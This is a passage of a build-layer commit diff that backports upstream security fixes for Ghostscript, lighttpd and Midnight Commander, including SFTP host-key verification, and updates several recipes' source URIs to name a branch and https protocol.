b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch new file mode 100644 index 0000000000..f312f89e04 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch @@ -0,0 +1,65 @@ +From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Fri, 28 Jan 2022 08:21:19 +0000 +Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in + sampled_data_continue() + +Replace pop() (which does no checking, and doesn't handle stack extension +blocks) with ref_stack_pop() which does do all that. + +We still use pop() in one case (it's faster), but we have to later use +ref_stack_pop() before calling sampled_data_sample() which also accesses the +op stack. + +Fixes: +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675 + +Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7] +CVE: CVE-2021-45949 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + psi/zfsample.c | 13 ++++++++----- + 1 file changed, 8 insertions(+), 5 deletions(-) + +diff --git a/psi/zfsample.c b/psi/zfsample.c +index 0023fa4..f84671f 100644 +--- a/psi/zfsample.c ++++ b/psi/zfsample.c +@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */ + } + pop(num_out); /* Move op to base of result values */ +- ++ /* From here on, we have to use ref_stack_pop() rather than pop() ++ so that it handles stack extension blocks properly, before calling ++ sampled_data_sample() which also uses the op stack. ++ */ + /* Check if we are done collecting data. */ + + if (increment_cube_indexes(params, penum->indexes)) { + if (stack_depth_adjust == 0) +- pop(O_STACK_PAD); /* Remove spare stack space */ ++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */ + else +- pop(stack_depth_adjust - num_out); ++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out); + /* Execute the closing procedure, if given */ + code = 0; + if (esp_finish_proc != 0) +@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + if ((O_STACK_PAD - stack_depth_adjust) < 0) { + stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); + check_op(stack_depth_adjust); +- pop(stack_depth_adjust); ++ ref_stack_pop(&o_stack, stack_depth_adjust); + } + else { + check_ostack(O_STACK_PAD - stack_depth_adjust); +- push(O_STACK_PAD - stack_depth_adjust); ++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust); + for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) + make_null(op - i); + } +-- +2.17.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch new file mode 100644 index 0000000000..722bab4ddb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch @@ -0,0 +1,51 @@ +From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Fri, 12 Feb 2021 10:34:23 +0000 +Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation. + +During function result sampling, after the callout to the Postscript +interpreter, make sure there is enough stack space available before pushing +or popping entries. + +In thise case, the Postscript procedure for the "function" is totally invalid +(as a function), and leaves the op stack in an unrecoverable state (as far as +function evaluation is concerned). We end up popping more entries off the +stack than are available. + +To cope, add in stack limit checking to throw an appropriate error when this +happens. + +Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25] +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + psi/zfsample.c | 14 +++++++++++--- + 1 file changed, 11 insertions(+), 3 deletions(-) + +diff --git a/psi/zfsample.c b/psi/zfsample.c +index 290809405..652ae02c6 100644 +--- a/psi/zfsample.c ++++ b/psi/zfsample.c +@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + } else { + if (stack_depth_adjust) { + stack_depth_adjust -= num_out; +- push(O_STACK_PAD - stack_depth_adjust); +- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) +- make_null(op - i); ++ if ((O_STACK_PAD - stack_depth_adjust) < 0) { ++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); ++ check_op(stack_depth_adjust); ++ pop(stack_depth_adjust); ++ } ++ else { ++ check_ostack(O_STACK_PAD - stack_depth_adjust); ++ push(O_STACK_PAD - stack_depth_adjust); ++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) ++ make_null(op - i); ++ } + } + } + +-- +2.25.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb index 35826c2549..958a88e968 100644 --- a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb +++ b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb @@ -33,6 +33,9 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d file://do-not-check-local-libpng-source.patch \ file://avoid-host-contamination.patch \ file://mkdir-p.patch \ + file://0001-Bug-704342-Include-device-specifier-strings-in-acces.patch \ + file://check-stack-limits-after-function-evalution.patch \ + file://CVE-2021-45949.patch \ " SRC_URI = "${SRC_URI_BASE} \ diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index c51f163e9b..3b738f82e7 100644 --- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" diff --git a/meta/recipes-extended/iputils/iputils_s20200821.bb b/meta/recipes-extended/iputils/iputils_s20200821.bb index e43abf2629..dd541d4d48 100644 --- a/meta/recipes-extended/iputils/iputils_s20200821.bb +++ b/meta/recipes-extended/iputils/iputils_s20200821.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ " SRCREV = "23c3782ae0c7f9c6ae59dbed8ad9204f8758542b" diff --git a/meta/recipes-extended/libaio/libaio_0.3.112.bb b/meta/recipes-extended/libaio/libaio_0.3.112.bb index b3606474a5..3892f3244e 100644 --- a/meta/recipes-extended/libaio/libaio_0.3.112.bb +++ b/meta/recipes-extended/libaio/libaio_0.3.112.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://libaio_fix_for_mips_syscalls.patch \ file://system-linkage.patch \ diff --git a/meta/recipes-extended/libarchive/libarchive_3.5.1.bb b/meta/recipes-extended/libarchive/libarchive_3.5.3.bb index 1387b69066..92bb223784 100644 --- a/meta/recipes-extended/libarchive/libarchive_3.5.1.bb +++ b/meta/recipes-extended/libarchive/libarchive_3.5.3.bb @@ -34,7 +34,7 @@ EXTRA_OECONF += "--enable-largefile" SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" -SRC_URI[sha256sum] = "9015d109ec00bb9ae1a384b172bf2fc1dff41e2c66e5a9eeddf933af9db37f5a" +SRC_URI[sha256sum] = "72788e5f58d16febddfa262a5215e05fc9c79f2670f641ac039e6df44330ef51" inherit autotools update-alternatives pkgconfig diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb index badb71d977..0690d4cd3b 100644 --- a/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.3.0" SRCREV = "fbad7b36acaa89a54023930af70805649f962999" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..984cc98fc2 100644 --- a/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb @@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}" SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb index fa6e8a3c4d..2b5da4d932 100644 --- a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb +++ b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ " SRCREV = "4bc791c0d235eb14bfe4c5da607206bfdfa6983d" diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch new file mode 100644 index 0000000000..f4e93d1065 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch @@ -0,0 +1,97 @@ +Upstream-Status: Backport +CVE: CVE-2022-22707 +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001 +From: povcfe <povcfe@qq.com> +Date: Wed, 5 Jan 2022 11:11:09 +0000 +Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134) + +(thx povcfe) + +(edited: gstrauss) + +There is a potential remote denial of service in lighttpd mod_extforward +under specific, non-default and uncommon 32-bit lighttpd mod_extforward +configurations. + +Under specific, non-default and uncommon lighttpd mod_extforward +configurations, a remote attacker can trigger a 4-byte out-of-bounds +write of value '-1' to the stack. This is not believed to be exploitable +in any way beyond triggering a crash of the lighttpd server on systems +where the lighttpd server has been built 32-bit and with compiler flags +which enable a stack canary -- gcc/clang -fstack-protector-strong or +-fstack-protector-all, but bug not visible with only -fstack-protector. + +With standard lighttpd builds using -O2 optimization on 64-bit x86_64, +this bug has not been observed to cause adverse behavior, even with +gcc/clang -fstack-protector-strong. + +For the bug to be reachable, the user must be using a non-default +lighttpd configuration which enables mod_extforward and configures +mod_extforward to accept and parse the "Forwarded" header from a trusted +proxy. At this time, support for RFC7239 Forwarded is not common in CDN +providers or popular web server reverse proxies. It bears repeating that +for the user to desire to configure lighttpd mod_extforward to accept +"Forwarded", the user must also be using a trusted proxy (in front of +lighttpd) which understands and actively modifies the "Forwarded" header +sent to lighttpd. + +lighttpd natively supports RFC7239 "Forwarded" +hiawatha natively supports RFC7239 "Forwarded" + +nginx can be manually configured to add a "Forwarded" header +https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/ + +A 64-bit build of lighttpd on x86_64 (not known to be affected by bug) +in front of another 32-bit lighttpd will detect and reject a malicious +"Forwarded" request header, thereby thwarting an attempt to trigger +this bug in an upstream 32-bit lighttpd. + +The following servers currently do not natively support RFC7239 Forwarded: +nginx +apache2 +caddy +node.js +haproxy +squid +varnish-cache +litespeed + +Given the general dearth of support for RFC7239 Forwarded in popular +CDNs and web server reverse proxies, and given the prerequisites in +lighttpd mod_extforward needed to reach this bug, the number of lighttpd +servers vulnerable to this bug is estimated to be vanishingly small. +Large systems using reverse proxies are likely running 64-bit lighttpd, +which is not known to be adversely affected by this bug. + +In the future, it is desirable for more servers to implement RFC7239 +Forwarded. lighttpd developers would like to thank povcfe for reporting +this bug so that it can be fixed before more CDNs and web servers +implement RFC7239 Forwarded. + +x-ref: + "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1" + https://redmine.lighttpd.net/issues/3134 + (not yet written or published) + CVE-2022-22707 +--- + src/mod_extforward.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/mod_extforward.c b/src/mod_extforward.c +index ba957e04..fdaef7f6 100644 +--- a/src/mod_extforward.c ++++ b/src/mod_extforward.c +@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c + while (s[i] == ' ' || s[i] == '\t') ++i; + if (s[i] == ';') { ++i; continue; } + if (s[i] == ',') { +- if (j >= (int)(sizeof(offsets)/sizeof(int))) break; ++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break; + offsets[++j] = -1; /*("offset" separating params from next proxy)*/ + ++i; + continue; +-- +2.25.1 + diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb index cf7f478915..73443f77b4 100644 --- a/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb +++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb @@ -14,6 +14,7 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \ lighttpd-module-accesslog" SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ + file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \ file://index.html.lighttpd \ file://lighttpd.conf \ file://lighttpd \ diff --git a/meta/recipes-extended/ltp/ltp_20210121.bb b/meta/recipes-extended/ltp/ltp_20210121.bb index 17adbf43f0..e816244f8c 100644 --- a/meta/recipes-extended/ltp/ltp_20210121.bb +++ b/meta/recipes-extended/ltp/ltp_20210121.bb @@ -33,7 +33,7 @@ SRCREV = "4d005621edd109d119627eb9210b224a63bf22cb" PR = "r4" HASHEQUIV_HASH_VERSION .= ".4" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0007-Fix-test_proc_kill-hanging.patch \ file://0001-Add-more-musl-exclusions.patch \ diff --git a/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch b/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch new file mode 100644 index 0000000000..408473664f --- /dev/null +++ b/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch @@ -0,0 +1,87 @@ +From e7bbf72544ab62db9c92bfe7bd1155227e78c621 Mon Sep 17 00:00:00 2001 +From: Andrew Borodin <aborodin@vmail.ru> +Date: Sat, 28 Aug 2021 11:46:53 +0300 +Subject: [PATCH] Ticket #4200: fix FTBFS with ncurses build with + --disable-widec. + +Upstream-Status: Accepted [https://github.com/MidnightCommander/mc/commit/e7bbf72544] +Signed-off-by: Andrew Borodin <aborodin@vmail.ru> +--- + lib/tty/tty-ncurses.c | 8 ++++++++ + lib/tty/tty-ncurses.h | 5 +++++ + lib/tty/tty-slang.h | 2 ++ + src/filemanager/boxes.c | 2 ++ + 4 files changed, 17 insertions(+) + +diff --git a/lib/tty/tty-ncurses.c b/lib/tty/tty-ncurses.c +index f619c0a7bf31..13058a624208 100644 +--- a/lib/tty/tty-ncurses.c ++++ b/lib/tty/tty-ncurses.c +@@ -560,6 +560,7 @@ tty_fill_region (int y, int x, int rows, int cols, unsigned char ch) + void + tty_colorize_area (int y, int x, int rows, int cols, int color) + { ++#ifdef ENABLE_SHADOWS + cchar_t *ctext; + wchar_t wch[10]; /* TODO not sure if the length is correct */ + attr_t attrs; +@@ -585,6 +586,13 @@ tty_colorize_area (int y, int x, int rows, int cols, int color) + } + + g_free (ctext); ++#else ++ (void) y; ++ (void) x; ++ (void) rows; ++ (void) cols; ++ (void) color; ++#endif /* ENABLE_SHADOWS */ + } + + /* --------------------------------------------------------------------------------------------- */ +diff --git a/lib/tty/tty-ncurses.h b/lib/tty/tty-ncurses.h +index d75df9533ab9..8feb17ccd045 100644 +--- a/lib/tty/tty-ncurses.h ++++ b/lib/tty/tty-ncurses.h +@@ -30,6 +30,11 @@ + #define NCURSES_CONST const + #endif + ++/* do not draw shadows if NCurses is built with --disable-widec */ ++#if defined(NCURSES_WIDECHAR) && NCURSES_WIDECHAR ++#define ENABLE_SHADOWS 1 ++#endif ++ + /*** typedefs(not structures) and defined constants **********************************************/ + + /*** enums ***************************************************************************************/ +diff --git a/lib/tty/tty-slang.h b/lib/tty/tty-slang.h +index 5b12c6512853..eeaade388af4 100644 +--- a/lib/tty/tty-slang.h ++++ b/lib/tty/tty-slang.h +@@ -23,6 +23,8 @@ + #define COLS SLtt_Screen_Cols + #define LINES SLtt_Screen_Rows + ++#define ENABLE_SHADOWS 1 ++ + /*** enums ***************************************************************************************/ + + enum +diff --git a/src/filemanager/boxes.c b/src/filemanager/boxes.c +index 3eb525be4a9b..98df5ff2ed9a 100644 +--- a/src/filemanager/boxes.c ++++ b/src/filemanager/boxes.c +@@ -280,7 +280,9 @@ appearance_box_callback (Widget * w, Widget * sender, widget_msg_t msg, int parm + switch (msg) + { + case MSG_INIT: ++#ifdef ENABLE_SHADOWS + if (!tty_use_colors ()) ++#endif + { + Widget *shadow; + +-- +2.34.1 + diff --git a/meta/recipes-extended/mc/files/CVE-2021-36370.patch b/meta/recipes-extended/mc/files/CVE-2021-36370.patch new file mode 100644 index 0000000000..d6a26871bd --- /dev/null +++ b/meta/recipes-extended/mc/files/CVE-2021-36370.patch @@ -0,0 +1,609 @@ +Backport patch to fix CVE-2021-36370. + +Upstream-Status: Backport [https://github.com/MidnightCommander/mc/commit/9235d3c] +CVE: CVE-2021-36370 + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 9235d3c232d13ad7f973346077c9cf2eaa77dc5f Mon Sep 17 00:00:00 2001 +From: Andrew Borodin <aborodin@vmail.ru> +Date: Mon, 12 Jul 2021 08:48:18 +0300 +Subject: [PATCH] SFTPFS: verify server fingerprint (fix CVE-2021-36370). + +Use ~/.ssh/known_hosts file to verify server fingerprint +using ssh way: + +$ ssh localhost +The authenticity of host 'localhost (127.0.0.1)' can't be established. +ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8. +Are you sure you want to continue connecting (yes/no)? no +ssh: Host key verification failed. + +$ ssh localhost +The authenticity of host 'localhost (127.0.0.1)' can't be established. +ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8. +Are you sure you want to continue connecting (yes/no)? yes +Warning: Permanently added 'localhost' (ED25519) to the list of known hosts. +andrew@localhost's password: + +Thanks the Curl project for the used code. + +Signed-off-by: Andrew Borodin <aborodin@vmail.ru> +Signed-off-by: Yury V. Zaytsev <yury.zaytsev@moneymeets.com> +--- + doc/man/mc.1.in | 15 ++ + doc/man/ru/mc.1.in | 14 ++ + src/vfs/sftpfs/connection.c | 428 +++++++++++++++++++++++++++++++++++- + src/vfs/sftpfs/internal.h | 5 +- + 4 files changed, 452 insertions(+), 10 deletions(-) + +diff --git a/doc/man/mc.1.in b/doc/man/mc.1.in +index c0c06e32f7..7a3d118384 100644 +--- a/doc/man/mc.1.in ++++ b/doc/man/mc.1.in +@@ -3364,6 +3364,21 @@ Examples: + sftp://joe@noncompressed.ssh.edu/private + sftp://joe@somehost.ssh.edu:2222/private + .fi ++.PP ++When establishing the connection, server key fingerprint is verified using ++the ~/.ssh/known_hosts file. If the host/key pair is not found or the host is found, ++but the key doesn't match, an appropriate message is shown. ++There are three buttons in the message dialog: ++.PP ++.B [Yes] ++add new host/key pair to the ~/.ssh/known_hosts file and continue. ++.PP ++.B [Ignore] ++do not add new host/key pair to the ~/.ssh/known_hosts file, but continue ++nevertheless (at you own risk). ++.PP ++.B [No] ++abort connection. + .\"NODE " Undelete File System" + .SH " Undelete File System" + On Linux systems, if you asked configure to use the ext2fs undelete +diff --git a/doc/man/ru/mc.1.in b/doc/man/ru/mc.1.in +index 7609da1127..bc0c1810a9 100644 +--- a/doc/man/ru/mc.1.in ++++ b/doc/man/ru/mc.1.in +@@ -3874,6 +3874,20 @@ bash\-совместимая оболочка shell. + sftp://joe@noncompressed.ssh.edu/private + sftp://joe@somehost.ssh.edu:2222/private + .fi ++При установлении соединения происходит проверка ключа сервера с использованием ++файла ~/.ssh/known_hosts file. Если пара сервер/ключ в этом файле не найдена ++или сервер найден, но ключ не соответствует, пользователю показывается ++окно с соответствующим сообщением, содержащее три кнопки: ++.PP ++.B [Да] ++добавить новую пару сервер/ключ в файл ~/.ssh/known_hosts и продолжить соединение. ++.PP ++.B [Игнорировать] ++не добавлять новую пару сервер/ключ в файл ~/.ssh/known_hosts и всё равно ++продолжить соединение (на свой страх и риск). ++.PP ++.B [Нет] ++прервать соединение. + .\"NODE " Undelete File System" + .SH " Файловая система UFS (Undelete File System)" + В ОС Linux можно сконфигурировать файловую систему ext2fs, используемую +diff --git a/src/vfs/sftpfs/connection.c b/src/vfs/sftpfs/connection.c +index 9f8ea5633b..acd5026515 100644 +--- a/src/vfs/sftpfs/connection.c ++++ b/src/vfs/sftpfs/connection.c +@@ -42,6 +42,8 @@ + #include "lib/util.h" + #include "lib/tty/tty.h" /* tty_enable_interrupt_key () */ + #include "lib/vfs/utilvfs.h" ++#include "lib/mcconfig.h" /* mc_config_get_home_dir () */ ++#include "lib/widget.h" /* query_dialog () */ + + #include "internal.h" + +@@ -49,10 +51,37 @@ + + /*** file scope macro definitions ****************************************************************/ + ++#define SHA1_DIGEST_LENGTH 20 ++ + /*** file scope type declarations ****************************************************************/ + + /*** file scope variables ************************************************************************/ + ++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519 ++static const char *const hostkey_method_ssh_ed25519 = "ssh-ed25519"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521 ++static const char *const hostkey_method_ssh_ecdsa_521 = "ecdsa-sha2-nistp521"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384 ++static const char *const hostkey_method_ssh_ecdsa_384 = "ecdsa-sha2-nistp384"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256 ++static const char *const hostkey_method_ssh_ecdsa_256 = "ecdsa-sha2-nistp256"; ++#endif ++static const char *const hostkey_method_ssh_rsa = "ssh-rsa"; ++static const char *const hostkey_method_ssh_dss = "ssh-dss"; ++ ++/** ++ * ++ * The current implementation of know host key checking has following limitations: ++ * ++ * - Only plain-text entries are supported (`HashKnownHosts no` OpenSSH option) ++ * - Only HEX-encoded SHA1 fingerprint display is supported (`FingerprintHash` OpenSSH option) ++ * - Resolved IP addresses are *not* saved/validated along with the hostnames ++ * ++ */ ++ + static const char *kbi_passwd = NULL; + static const struct vfs_s_super *kbi_super = NULL; + +@@ -70,9 +99,12 @@ static const struct vfs_s_super *kbi_super = NULL; + static int + sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + { ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); + struct addrinfo hints, *res = NULL, *curr_res; + int my_socket = 0; + char port[BUF_TINY]; ++ static char address_ipv4[INET_ADDRSTRLEN]; ++ static char address_ipv6[INET6_ADDRSTRLEN]; + int e; + + mc_return_val_if_error (mcerror, LIBSSH2_INVALID_SOCKET); +@@ -120,6 +152,30 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + { + int save_errno; + ++ switch (curr_res->ai_addr->sa_family) ++ { ++ case AF_INET: ++ sftpfs_super->ip_address = ++ inet_ntop (AF_INET, &((struct sockaddr_in *) curr_res->ai_addr)->sin_addr, ++ address_ipv4, INET_ADDRSTRLEN); ++ break; ++ case AF_INET6: ++ sftpfs_super->ip_address = ++ inet_ntop (AF_INET6, &((struct sockaddr_in6 *) curr_res->ai_addr)->sin6_addr, ++ address_ipv6, INET6_ADDRSTRLEN); ++ break; ++ default: ++ sftpfs_super->ip_address = NULL; ++ } ++ ++ if (sftpfs_super->ip_address == NULL) ++ { ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: failed to convert remote host IP address into text form")); ++ my_socket = LIBSSH2_INVALID_SOCKET; ++ goto ret; ++ } ++ + my_socket = socket (curr_res->ai_family, curr_res->ai_socktype, curr_res->ai_protocol); + + if (my_socket < 0) +@@ -161,8 +217,358 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + } + + /* --------------------------------------------------------------------------------------------- */ ++ ++/** ++ * Read ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param mcerror pointer to the error handler ++ * @return TRUE on success, FALSE otherwise ++ * ++ * Thanks the Curl project for the code used in this function. ++ */ ++static gboolean ++sftpfs_read_known_hosts (struct vfs_s_super *super, GError ** mcerror) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ struct libssh2_knownhost *store = NULL; ++ int rc; ++ gboolean found = FALSE; ++ ++ sftpfs_super->known_hosts = libssh2_knownhost_init (sftpfs_super->session); ++ if (sftpfs_super->known_hosts == NULL) ++ goto err; ++ ++ sftpfs_super->known_hosts_file = ++ mc_build_filename (mc_config_get_home_dir (), ".ssh", "known_hosts", (char *) NULL); ++ rc = libssh2_knownhost_readfile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file, ++ LIBSSH2_KNOWNHOST_FILE_OPENSSH); ++ if (rc > 0) ++ { ++ const char *kh_name_end = NULL; ++ ++ while (!found && libssh2_knownhost_get (sftpfs_super->known_hosts, &store, store) == 0) ++ { ++ /* For non-standard ports, the name will be enclosed in ++ * square brackets, followed by a colon and the port */ ++ if (store == NULL) ++ continue; ++ ++ if (store->name == NULL) ++ found = TRUE; ++ else if (store->name[0] != '[') ++ found = strcmp (store->name, super->path_element->host) == 0; ++ else ++ { ++ int port; ++ ++ kh_name_end = strstr (store->name, "]:"); ++ if (kh_name_end == NULL) ++ /* Invalid host pattern */ ++ continue; ++ ++ port = (int) g_ascii_strtoll (kh_name_end + 2, NULL, 10); ++ if (port == super->path_element->port) ++ { ++ size_t kh_name_size; ++ ++ kh_name_size = strlen (store->name) - 1 - strlen (kh_name_end); ++ found = strncmp (store->name + 1, super->path_element->host, kh_name_size) == 0; ++ } ++ } ++ } ++ } ++ ++ if (found) ++ { ++ int mask; ++ const char *hostkey_method = NULL; ++ ++ mask = store->typemask & LIBSSH2_KNOWNHOST_KEY_MASK; ++ ++ switch (mask) ++ { ++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519 ++ case LIBSSH2_KNOWNHOST_KEY_ED25519: ++ hostkey_method = hostkey_method_ssh_ed25519; ++ break; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_521: ++ hostkey_method = hostkey_method_ssh_ecdsa_521; ++ break; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_384: ++ hostkey_method = hostkey_method_ssh_ecdsa_384; ++ break; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_256: ++ hostkey_method = hostkey_method_ssh_ecdsa_256; ++ break; ++#endif ++ case LIBSSH2_KNOWNHOST_KEY_SSHRSA: ++ hostkey_method = hostkey_method_ssh_rsa; ++ break; ++ case LIBSSH2_KNOWNHOST_KEY_SSHDSS: ++ hostkey_method = hostkey_method_ssh_dss; ++ break; ++ case LIBSSH2_KNOWNHOST_KEY_RSA1: ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: found host key of unsupported type: RSA1")); ++ return FALSE; ++ default: ++ mc_propagate_error (mcerror, 0, "%s %d", _("sftp: unknown host key type:"), mask); ++ return FALSE; ++ } ++ ++ rc = libssh2_session_method_pref (sftpfs_super->session, LIBSSH2_METHOD_HOSTKEY, ++ hostkey_method); ++ if (rc < 0) ++ goto err; ++ } ++ ++ return TRUE; ++ ++ err: ++ { ++ int sftp_errno; ++ ++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session); ++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror); ++ } ++ return FALSE; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++ ++/** ++ * Write new host + key pair to the ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param remote_key he key for the remote host ++ * @param remote_key_len length of @remote_key ++ * @param type_mask info about format of host name, key and key type ++ * @return 